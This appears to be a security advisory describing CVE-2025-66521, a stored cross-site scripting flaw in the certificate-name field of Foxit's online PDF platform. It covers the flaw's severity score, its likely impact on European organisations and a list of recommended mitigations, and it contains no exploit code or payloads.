CVE-2025-66521 is a stored cross-site scripting (XSS) vulnerability identified in the Trusted Certificates feature of Foxit Software Inc.'s pdfonline.foxit.com platform. The vulnerability arises because the application improperly neutralizes input during web page generation, specifically failing to sanitize the certificate name field before rendering it into the Document Object Model (DOM). An attacker with low privileges can inject a crafted payload as a certificate name, which is persistently stored and executed every time the Trusted Certificates view is accessed by any user. This persistent XSS flaw allows execution of arbitrary JavaScript in the context of the victim's browser session, potentially leading to theft of sensitive information such as authentication tokens, cookies, or other confidential data. The CVSS v3.1 score of 6.3 reflects a medium severity, with the vector indicating network attack vector (AV:N), low attack complexity (AC:L), requiring privileges (PR:L), user interaction (UI:R), unchanged scope (S:U), high confidentiality impact (C:H), low integrity impact (I:L), and no availability impact (A:N). The vulnerability affects all versions of pdfonline.foxit.com before December 1, 2025. No public exploits have been reported yet, but the nature of stored XSS makes it a significant risk for phishing, session hijacking, or further exploitation within affected environments. The lack of proper input validation and output encoding in the Trusted Certificates feature is the root cause. Since this is a web-based service, the attack surface includes all users who access the Trusted Certificates page, making it a concern for organizations relying on Foxit's online PDF tools for certificate management or document workflows.

For European organizations, this vulnerability poses a risk to confidentiality primarily, as attackers can steal session cookies, tokens, or other sensitive data from users accessing the Trusted Certificates feature. This can lead to account compromise, unauthorized access to sensitive documents, or lateral movement within an organization's network if credentials are harvested. The integrity impact is low but could enable attackers to inject misleading or malicious content into the user interface, potentially facilitating social engineering or phishing attacks. Availability is not affected. Organizations in sectors with high reliance on digital document workflows, such as finance, legal, healthcare, and government, are at greater risk due to the sensitive nature of their documents and certificates. The requirement for user interaction and low privileges means that insider threats or phishing campaigns could exploit this vulnerability. Given the widespread use of Foxit products in Europe, the vulnerability could impact a broad user base, increasing the potential for targeted attacks against European enterprises and public sector entities.

1. Apply patches or updates from Foxit Software Inc. as soon as they become available to address this vulnerability. 2. In the interim, restrict or sanitize user input for certificate names on the server side to prevent injection of malicious scripts. 3. Implement strict Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in the browser context. 4. Conduct regular security reviews and penetration testing focused on input validation and output encoding in web applications, especially those handling certificates or sensitive data. 5. Educate users about the risks of interacting with untrusted or suspicious certificate entries and encourage reporting of anomalies. 6. Monitor web application logs for unusual activity related to the Trusted Certificates feature to detect potential exploitation attempts. 7. Consider isolating or restricting access to the Trusted Certificates view to trusted administrators only, reducing the attack surface. 8. Employ web application firewalls (WAF) with rules designed to detect and block XSS payloads targeting this feature.